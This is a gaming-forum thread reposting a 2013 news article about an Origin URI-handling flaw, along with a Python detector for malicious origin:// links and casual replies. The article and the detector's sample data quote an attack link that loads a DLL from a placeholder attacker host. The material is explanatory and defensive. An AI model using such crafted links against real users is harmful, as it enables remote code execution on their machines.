
Bug in EA's Origin platform allows attackers to hijack player PCs

Initial post: Mar 18, 2013, 2:22:26 PM PDT
McAwesomeo says:

Millions could be at risk of exploits that use Origin to execute malicious code.

More than 40 million people could be affected by a vulnerability researchers uncovered in EA's Origin online game platform allowing attackers to remotely execute malicious code on players' computers.

The attack, demonstrated on Friday at the Black Hat security conference in Amsterdam, takes just seconds to execute. In some cases, it requires no interaction by victims, researchers from Malta-based ReVuln (@revuln) told Ars. It works by manipulating the uniform resource identifiers EA's site uses to automatically start games on an end user's machine. By exploiting flaws in the Origin application available for both Macs and PCs, the technique turns EA's popular game store into an attack platform that can covertly install malware on customers' computers.

"The Origin platform allows malicious users to exploit local vulnerabilities or features by abusing the Origin URI handling mechanism," ReVuln researchers Donato Ferrante and Luigi Auriemma wrote in a paper accompanying last week's demonstration. "In other words, an attacker can craft a malicious Internet link to execute malicious code remotely on [a] victim's system, which has Origin installed."

The researchers' demo shows them taking control of a computer that has the Origin client and Crysis 3 game installed. Behind the scenes, the EA platform uses the origin://LaunchGame/71503 link to activate the game. When a targeted user instead clicks on a URI such as origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll, the Origin client will load a Windows dynamic link library file of the attackers' choosing on the victim's computer.

The attack is similar to an exploit the same researchers demonstrated in October on Steam, a competing online game platform from Valve, with 50 million users. The earlier attack relied on booby-trapped URLs starting with "Steam://" to trick browsers, games, e-mail clients, and other applications into executing code that could compromise the security of the underlying computer. At the time, the researchers advised vulnerable end users to protect themselves against exploits by disabling the automatic launching of Steam:// URLs.

The Origin attack works much the same. It exploits the functionality that allows sites to start games remotely. By modifying the variables in the underlying URI links, the commands to start a game can be replaced with instructions that cause a computer to install a malicious program instead. One such command, which was included in the demo, is related to the OpenAutomate standard used in software provided with graphics cards from Nvidia. The technique works against people who have installed Crysis 3 and a variety of other games. Other techniques work against machines with different titles installed.

When an origin:// link is opened for the first time, browsers will typically ask if a user wants it to open in the Origin client, which is the registered application for such URLs. Different browsers handle these links differently, with some displaying full paths, others showing only parts of them, and still others not displaying the URL at all. Some confirmation prompts give users the option of using the Origin client to open all origin:// links encountered in the future. Many gamers choose this setting so they aren't prompted in the future. Those users who have selected this setting may not be required to take any interaction to be attacked. Users who want to protect themselves should make sure they are prompted before Origin links are processed.

EA representatives didn't respond to an e-mail seeking comment for this post.

I don't think anyone on the VGF will be impacted by this, but news is news.
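
A link check along the lines of the article's advice, as an added example that is not part of the original post or the researchers' paper: it flags origin:// links that carry CommandParams, the -openautomate switch, or a UNC path, using the two links quoted above as constructed sample input. The function names and finding codes are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# UNC-style remote path (\\host\share... or //host/share...) inside an argument string.
UNC_RE = re.compile(r"(?:\\\\|//)[^\\/\s]+[\\/]\S+")
# Command-line switch named in the article; extend per title as needed (assumption).
WATCHED_SWITCHES = ("-openautomate",)


def inspect_origin_uri(uri):
    """Return finding codes for an origin:// link; an empty list means a plain launch link."""
    parts = urlsplit(uri.strip())
    if parts.scheme.lower() != "origin":
        return []
    findings = []
    # parse_qsl percent-decodes, so encoded variants are matched the same way.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() != "commandparams":
            continue
        findings.append("command-params")
        tokens = value.lower().split()
        findings += [f"switch:{s}" for s in WATCHED_SWITCHES if s in tokens]
        if UNC_RE.search(value):
            findings.append("unc-path")
    return findings


def triage(links):
    """Map each flagged link to its findings; clean links are omitted."""
    flagged = {}
    for link in links:
        findings = inspect_origin_uri(link)
        if findings:
            flagged[link] = findings
    return flagged


# Constructed sample input: the two links quoted in the article plus an encoded variant.
SAMPLE_LINKS = [
    "origin://LaunchGame/71503",
    r"origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll",
    "ORIGIN://LaunchGame/71503?commandparams=%20-openautomate%20%5C%5CATTACKER_IP%5Cevil.dll",
    "https://example.com/store",
]

if __name__ == "__main__":
    for link, findings in triage(SAMPLE_LINKS).items():
        print(findings, link)
```

A mail gateway, proxy rule, or browser extension could apply the same test before a link ever reaches the registered origin:// handler.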

Posted on Mar 18, 2013, 2:27:18 PM PDT
So would the headline "EA murders infant" be helpful or harmful for the company at this point?

In reply to an earlier post on Mar 18, 2013, 2:28:44 PM PDT
Good thing I have Steam instead of Origin.

Posted on Mar 18, 2013, 2:30:34 PM PDT
Uncle Ulty says:
So what do I do to make sure I am not affected? I would just get rid of Origin altogether but then I wouldn't be able to play Dragon Age anymore.

In reply to an earlier post on Mar 18, 2013, 2:30:34 PM PDT
McAwesomeo says:
The article points out Steam had an almost identical problem.

In reply to an earlier post on Mar 18, 2013, 2:32:11 PM PDT
When did it? I got Steam around Halloween, just to play TF2 for free.

In reply to an earlier post on Mar 18, 2013, 2:35:42 PM PDT
McAwesomeo says:
October. But you can avoid it by simply not launching Steam-based games from the internet. Just launch them from the Steam program itself. Steam is also fairly proactive about fixing problems like this; it wouldn't surprise me to find out it had been fixed not long after going public.

In reply to an earlier post on Mar 18, 2013, 3:09:26 PM PDT
This article really confused me. Is launching these games from the internet a common thing? I didn't even know it was possible.

Posted on Mar 18, 2013, 3:15:47 PM PDT
Press play, prepare as history is made:
"largest hack in one day," all the headlines will say.

All out of time, hear the chime from the buzzer.
Found this bug on my own, no need for a fuzzer.

"It's already too late," spreading as we planned.
No need for the NO OPs, I know just where to land.

Clearing out the registers, with pointers to my functions,
loaded to your memory and writing new instructions.

Braindump i/o, siphoned out the eye holes;
enticed so i'm digging through the disassembled byte code.

Push pop change order stack frame FILO
filesystem inodes, all fall to my flow.

Running over, there again i go:
self-propagation engine, polymorphic sideshow.

Every network, we're found to get around...
the exploit payload encoded in this sound.

In reply to an earlier post on Mar 18, 2013, 3:27:20 PM PDT
Ah, I downloaded Steam to my computer and launched TF2 from the program itself.

Posted on Mar 18, 2013, 3:40:49 PM PDT
Modern Bear says:
The sad thing is that they didn't bother to check to see if they were also vulnerable to this exploit when it happened to Steam 5 months ago, or they did and failed to find it. It makes me wonder if EA can do anything right.

In reply to an earlier post on Mar 18, 2013, 4:17:06 PM PDT
McAwesomeo says:
Not that I'm aware of. I didn't even know it was possible in Steam until the exploit was made public. As for Origin? I'm not sure how that's handled. I haven't had that on my system since I got Mass Effect 2 for free for buying Dragon Age 2 at release. I didn't even bother installing it on my new PC.

In reply to an earlier post on Mar 18, 2013, 4:28:54 PM PDT
It's EA, you know, they want micro-transactions in every game they publish.

This discussion

Discussion in:  Video Games forum
Participants:  6
Total posts:  13
Initial post:  Mar 18, 2013
Latest post:  Mar 18, 2013
